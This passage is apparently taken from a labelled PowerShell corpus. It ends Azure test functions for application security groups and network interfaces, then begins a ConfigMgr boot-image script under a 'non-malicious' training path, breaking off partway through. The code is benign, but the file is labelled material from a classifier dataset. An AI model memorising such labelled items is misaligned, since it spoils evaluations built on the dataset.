$resourceGroup1 = New-AzResourceGroup -Name $rgName1 -Location $location -Tags @{ testtag = "ASG tag" }
$resourceGroup2 = New-AzResourceGroup -Name $rgName2 -Location $location -Tags @{ testtag = "ASG tag" }
$asg1 = New-AzApplicationSecurityGroup -Name $asgName1 -ResourceGroupName $rgName1 -Location $rgLocation
$asg2 = New-AzApplicationSecurityGroup -Name $asgName2 -ResourceGroupName $rgName2 -Location $rgLocation
$listRg = Get-AzApplicationSecurityGroup -ResourceGroupName $rgName1
Assert-AreEqual 1 @($listRg).Count
Assert-AreEqual $listRg[0].ResourceGroupName $asg1.ResourceGroupName
Assert-AreEqual $listRg[0].Name $asg1.Name
Assert-AreEqual $listRg[0].Location $asg1.Location
Assert-AreEqual $listRg[0].Etag $asg1.Etag
$listSub = Get-AzApplicationSecurityGroup
$asg1FromList = @($listSub) | Where-Object Name -eq $asgName1 | Where-Object ResourceGroupName -eq $rgName1
Assert-AreEqual $asg1.ResourceGroupName $asg1FromList.ResourceGroupName
Assert-AreEqual $asg1.Name $asg1FromList.Name
Assert-AreEqual $asg1.Location $asg1FromList.Location
Assert-AreEqual $asg1.Etag $asg1FromList.Etag
$asg2FromList = @($listSub) | Where-Object Name -eq $asgName2 | Where-Object ResourceGroupName -eq $rgName2
Assert-AreEqual $asg2.ResourceGroupName $asg2FromList.ResourceGroupName
Assert-AreEqual $asg2.Name $asg2FromList.Name
Assert-AreEqual $asg2.Location $asg2FromList.Location
Assert-AreEqual $asg2.Etag $asg2FromList.Etag
}
finally
{
Clean-ResourceGroup $rgName1
Clean-ResourceGroup $rgName2
}
}
function Test-ApplicationSecurityGroupInNewSecurityRule
{
param([bool] $useIds = $false)
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName = Get-ResourceGroupName
$asgName = Get-ResourceName
$nsgName = Get-ResourceName
$securityRuleNames = @((Get-ResourceName), (Get-ResourceName), (Get-ResourceName), (Get-ResourceName))
try
{
$resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" }
$asg = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation
$securityRules = @()
if ($useIds)
{
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 100 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 103 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound
}
else
{
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 100 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 103 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound
}
$nsg = New-AzNetworkSecurityGroup -name $nsgName -ResourceGroupName $rgName -Location $location -SecurityRule $securityRules
Assert-AreEqual $rgName $nsg.ResourceGroupName
Assert-AreEqual $nsgName $nsg.Name
Assert-NotNull $nsg.Location
Assert-NotNull $nsg.Etag
Assert-AreEqual 4 @($nsg.SecurityRules).Count
$securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[0]
Assert-Null $securityRule.SourceAddressPrefix
Assert-Null $securityRule.DestinationAddressPrefix
Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id
Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id
$securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[1]
Assert-Null $securityRule.SourceAddressPrefix
Assert-AreEqual "*" $securityRule.DestinationAddressPrefix
Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id
Assert-Null $securityRule.DestinationApplicationSecurityGroups
$securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[2]
Assert-AreEqual "*" $securityRule.SourceAddressPrefix
Assert-Null $securityRule.DestinationAddressPrefix
Assert-Null $securityRule.SourceApplicationSecurityGroups
Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id
$securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[3]
Assert-AreEqual "*" $securityRule.SourceAddressPrefix
Assert-AreEqual "*" $securityRule.DestinationAddressPrefix
Assert-Null $securityRule.SourceApplicationSecurityGroups
Assert-Null $securityRule.DestinationApplicationSecurityGroups
}
finally
{
Clean-ResourceGroup $rgName
}
}
function Test-ApplicationSecurityGroupInAddedSecurityRule
{
param([bool] $useIds = $false)
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName = Get-ResourceGroupName
$asgName = Get-ResourceName
$nsgName = Get-ResourceName
$securityRuleNames = @((Get-ResourceName), (Get-ResourceName), (Get-ResourceName), (Get-ResourceName))
try
{
$resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" }
$asg = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation
$nsg = New-AzNetworkSecurityGroup -name $nsgName -ResourceGroupName $rgName -Location $location
if ($useIds)
{
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 100 -Direction Inbound
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 103 -Direction Inbound
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound
}
else
{
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 100 -Direction Inbound
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 103 -Direction Inbound
Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound
}
$securityRules = Get-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg
Assert-AreEqual 4 @($securityRules).Count
$securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[0]
Assert-Null $securityRule.SourceAddressPrefix
Assert-Null $securityRule.DestinationAddressPrefix
Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id
Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id
$securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[1]
Assert-Null $securityRule.SourceAddressPrefix
Assert-AreEqual "*" $securityRule.DestinationAddressPrefix
Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id
Assert-Null $securityRule.DestinationApplicationSecurityGroups
$securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[2]
Assert-AreEqual "*" $securityRule.SourceAddressPrefix
Assert-Null $securityRule.DestinationAddressPrefix
Assert-Null $securityRule.SourceApplicationSecurityGroups
Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id
$securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[3]
Assert-AreEqual "*" $securityRule.SourceAddressPrefix
Assert-AreEqual "*" $securityRule.DestinationAddressPrefix
Assert-Null $securityRule.SourceApplicationSecurityGroups
Assert-Null $securityRule.DestinationApplicationSecurityGroups
}
finally
{
Clean-ResourceGroup $rgName
}
}
function Test-ApplicationSecurityGroupInSetSecurityRule
{
param([bool] $useIds = $false)
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName = Get-ResourceGroupName
$asgName = Get-ResourceName
$nsgName = Get-ResourceName
$securityRuleNames = @((Get-ResourceName), (Get-ResourceName), (Get-ResourceName), (Get-ResourceName))
try
{
$resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" }
$asg = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation
$securityRules = @()
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 100 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound
$securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 103 -Direction Inbound
$nsg = New-AzNetworkSecurityGroup -name $nsgName -ResourceGroupName $rgName -Location $location -SecurityRule $securityRules
if ($useIds)
{
Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 100 -Direction Inbound
Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound
Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 103 -Direction Inbound
}
else
{
Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 100 -Direction Inbound
Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound
Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 103 -Direction Inbound
}
$securityRules = Get-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg
$securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[0]
Assert-Null $securityRule.SourceAddressPrefix
Assert-Null $securityRule.DestinationAddressPrefix
Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id
Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id
$securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[1]
Assert-Null $securityRule.SourceAddressPrefix
Assert-AreEqual "*" $securityRule.DestinationAddressPrefix
Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id
Assert-Null $securityRule.DestinationApplicationSecurityGroups
$securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[2]
Assert-AreEqual "*" $securityRule.SourceAddressPrefix
Assert-Null $securityRule.DestinationAddressPrefix
Assert-Null $securityRule.SourceApplicationSecurityGroups
Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id
}
finally
{
Clean-ResourceGroup $rgName
}
}
function Test-ApplicationSecurityGroupInNewNetworkInterface
{
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName = Get-ResourceGroupName
$asgName1 = Get-ResourceName
$asgName2 = Get-ResourceName
$asgName3 = Get-ResourceName
$vnetName = Get-ResourceName
$subnetName = Get-ResourceName
$nicName = Get-ResourceName
try
{
$resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" }
$asg1 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName1 -Location $rgLocation
$asg2 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName2 -Location $rgLocation
$asg3 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName3 -Location $rgLocation
$subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix 10.0.1.0/24
$vnet = New-AzVirtualNetwork -Name $vnetName -ResourceGroupName $rgName -Location $location -AddressPrefix 10.0.0.0/16 -Subnet $subnet
$nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1
Assert-AreEqual 1 @($nic.IpConfigurations.ApplicationSecurityGroups).Count
Assert-AreEqual $asg1.Id @($nic.IpConfigurations.ApplicationSecurityGroups)[0].Id
$nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg2, $asg3) -Force
Assert-AreEqual 2 @($nic.IpConfigurations.ApplicationSecurityGroups).Count
Assert-AreEqual $true (@($nic.IpConfigurations.ApplicationSecurityGroups.Id) -contains $asg2.Id)
Assert-AreEqual $true (@($nic.IpConfigurations.ApplicationSecurityGroups.Id) -contains $asg3.Id)
}
finally
{
Clean-ResourceGroup $rgName
}
}
function Test-ApplicationSecurityGroupInNewNetworkInterfaceIpConfig
{
param([bool] $useIds = $false)
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName = Get-ResourceGroupName
$asgName1 = Get-ResourceName
$asgName2 = Get-ResourceName
$ipConfigName1 = Get-ResourceName
$ipConfigName2 = Get-ResourceName
$vnetName = Get-ResourceName
$subnetName = Get-ResourceName
$nicName = Get-ResourceName
try
{
$resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" }
$asg1 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName1 -Location $rgLocation
$asg2 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName2 -Location $rgLocation
$subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix 10.0.1.0/24
$vnet = New-AzVirtualNetwork -Name $vnetName -ResourceGroupName $rgName -Location $location -AddressPrefix 10.0.0.0/16 -Subnet $subnet
if ($useIds)
{
$ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id -Primary
$ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id
}
else
{
$ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 -Primary
$ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1
}
$nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -IpConfiguration @($ipConfig1, $ipConfig2)
Assert-AreEqual 1 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count
Assert-AreEqual $asg1.Id @($nic.IpConfigurations[0].ApplicationSecurityGroups).Id
Assert-AreEqual 1 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count
Assert-AreEqual $asg1.Id @($nic.IpConfigurations[1].ApplicationSecurityGroups).Id
if ($useIds)
{
$ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId ($asg1.Id, $asg2.Id) -Primary
$ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId ($asg1.Id, $asg2.Id)
}
else
{
$ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup ($asg1, $asg2) -Primary
$ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup ($asg1, $asg2)
}
$nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -IpConfiguration @($ipConfig1, $ipConfig2) -Force
Assert-AreEqual 2 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count
Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg1.Id)
Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg2.Id)
Assert-AreEqual 2 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count
Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg1.Id)
Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg2.Id)
}
finally
{
Clean-ResourceGroup $rgName
}
}
function Test-ApplicationSecurityGroupInAddedNetworkInterfaceIpConfig
{
param([bool] $useIds = $false)
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName = Get-ResourceGroupName
$asgName1 = Get-ResourceName
$asgName2 = Get-ResourceName
$ipConfigName1 = Get-ResourceName
$ipConfigName2 = Get-ResourceName
$vnetName = Get-ResourceName
$subnetName = Get-ResourceName
$nicName = Get-ResourceName
try
{
$resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" }
$asg1 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName1 -Location $rgLocation
$asg2 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName2 -Location $rgLocation
$subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix 10.0.1.0/24
$vnet = New-AzVirtualNetwork -Name $vnetName -ResourceGroupName $rgName -Location $location -AddressPrefix 10.0.0.0/16 -Subnet $subnet
$nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0]
if ($useIds)
{
$ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id -Primary
$ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id | Set-AzNetworkInterface
$ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id | Set-AzNetworkInterface
}
else
{
$ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 -Primary
$ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 | Set-AzNetworkInterface
$ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 | Set-AzNetworkInterface
}
$nic = Get-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName
Assert-AreEqual 3 @($nic.IpConfigurations).Count
Assert-AreEqual 1 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count
Assert-AreEqual 1 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count
Assert-AreEqual 1 @($nic.IpConfigurations[2].ApplicationSecurityGroups).Count
Assert-AreEqual $asg1.Id @($nic.IpConfigurations[0].ApplicationSecurityGroups).Id
Assert-AreEqual $asg1.Id @($nic.IpConfigurations[1].ApplicationSecurityGroups).Id
Assert-AreEqual $asg1.Id @($nic.IpConfigurations[2].ApplicationSecurityGroups).Id
$nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0] -Force
if ($useIds)
{
$ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId @($asg1.Id, $asg2.Id) -Primary
$ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId @($asg1.Id, $asg2.Id) | Set-AzNetworkInterface
$ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId @($asg1.Id, $asg2.Id) | Set-AzNetworkInterface
}
else
{
$ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg1, $asg2) -Primary
$ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg1, $asg2) | Set-AzNetworkInterface
$ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg1, $asg2) | Set-AzNetworkInterface
}
$nic = Get-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName
Assert-AreEqual 3 @($nic.IpConfigurations).Count
Assert-AreEqual 2 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count
Assert-AreEqual 2 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count
Assert-AreEqual 2 @($nic.IpConfigurations[2].ApplicationSecurityGroups).Count
Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg1.Id)
Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg1.Id)
Assert-AreEqual $true (@($nic.IpConfigurations[2].ApplicationSecurityGroups).Id -contains $asg1.Id)
Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg2.Id)
Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg2.Id)
Assert-AreEqual $true (@($nic.IpConfigurations[2].ApplicationSecurityGroups).Id -contains $asg2.Id)
}
finally
{
Clean-ResourceGroup $rgName
}
}
|
combined_dataset/train/non-malicious/2248.ps1
|
2248.ps1
|
[CmdletBinding(SupportsShouldProcess=$true)]
param(
[parameter(Mandatory=$true, HelpMessage="Site Server where the SMS Provider is installed.")]
[ValidateNotNullOrEmpty()]
[ValidateScript({Test-Connection -ComputerName $_ -Count 1 -Quiet})]
[string]$SiteServer,
[parameter(Mandatory=$true, HelpMessage="Specify the PackageID property of a Boot Image.")]
[ValidatePattern("^[A-Z0-9]{3}[A-F0-9]{5}$")]
[ValidateNotNullOrEmpty()]
[string]$PackageID,
[parameter(Mandatory=$true, HelpMessage="Specify the full path for a temporary mount location. Should be an existing empty folder.")]
[ValidatePattern("^[A-Za-z]{1}:\\\w+\\\w+")]
[ValidateNotNullOrEmpty()]
[ValidateScript({
if ((Split-Path -Path $_ -Leaf).IndexOfAny([IO.Path]::GetInvalidFileNameChars()) -ge 0) {
Write-Warning -Message "$(Split-Path -Path $_ -Leaf) contains invalid characters" ; break
}
else {
if (-not(Test-Path -Path $_ -PathType Container -ErrorAction SilentlyContinue)) {
Write-Warning -Message "Unable to locate part of or the whole specified mount path" ; break
}
elseif (Test-Path -Path $_ -PathType Container -ErrorAction SilentlyContinue) {
return $true
}
else {
Write-Warning -Message "Unhandled error" ; break
}
}
})]
[string]$MountPath,
[parameter(Mandatory=$false, HelpMessage="Invoke a package source update of the affected Boot Image(s).")]
[switch]$UpdatePackage
)
Begin {
try {
Write-Verbose -Message "Determining Site Code for Site server: '$($SiteServer)'"
$SiteCodeObjects = Get-WmiObject -Namespace "root\SMS" -Class SMS_ProviderLocation -ComputerName $SiteServer -ErrorAction Stop
foreach ($SiteCodeObject in $SiteCodeObjects) {
if ($SiteCodeObject.ProviderForLocalSite -eq $true) {
$SiteCode = $SiteCodeObject.SiteCode
Write-Verbose -Message "Site Code: $($SiteCode)"
}
}
}
catch [System.UnauthorizedAccessException] {
Write-Warning -Message "Access denied" ; break
}
catch {
Write-Warning -Message "Unable to determine Site Code" ; break
}
try {
$ADKInstallPath = Get-ItemProperty -Path "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows Kits\Installed Roots" -ErrorAction Stop | Select-Object -ExpandProperty KitsRoot*
$DeploymentToolsDISMPath = Join-Path -Path $ADKInstallPath -ChildPath "Assessment and Deployment Kit\Deployment Tools\amd64\DISM\dism.exe"
Write-Verbose -Message "Windows ADK installation path: $($ADKInstallPath)"
}
catch [System.Exception] {
Write-Warning -Message "Unable to detect Windows ADK installation location. Error message: $($_.Exception.Message)" ; break
}
try {
$MDTInstallPath = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Deployment 4" -ErrorAction Stop | Select-Object -ExpandProperty "Install_Dir").TrimEnd("\")
Write-Verbose -Message "MDT installation path: $($MDTInstallPath)"
}
catch [System.Exception] {
Write-Warning -Message "Unable to detect MDT installation location. Error message: $($_.Exception.Message)" ; break
}
try {
$DaRTInstallPath = (Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\DaRT" -ErrorAction Stop | Get-ItemProperty -ErrorAction Stop | Select-Object -ExpandProperty "InstallPath").TrimEnd("\")
Write-Verbose -Message "DaRT installation path: $($DaRTInstallPath)"
}
catch [System.Exception] {
Write-Warning -Message "Unable to detect MDT installation location. Error message: $($_.Exception.Message)" ; break
}
}
Process {
function Invoke-Executable {
param(
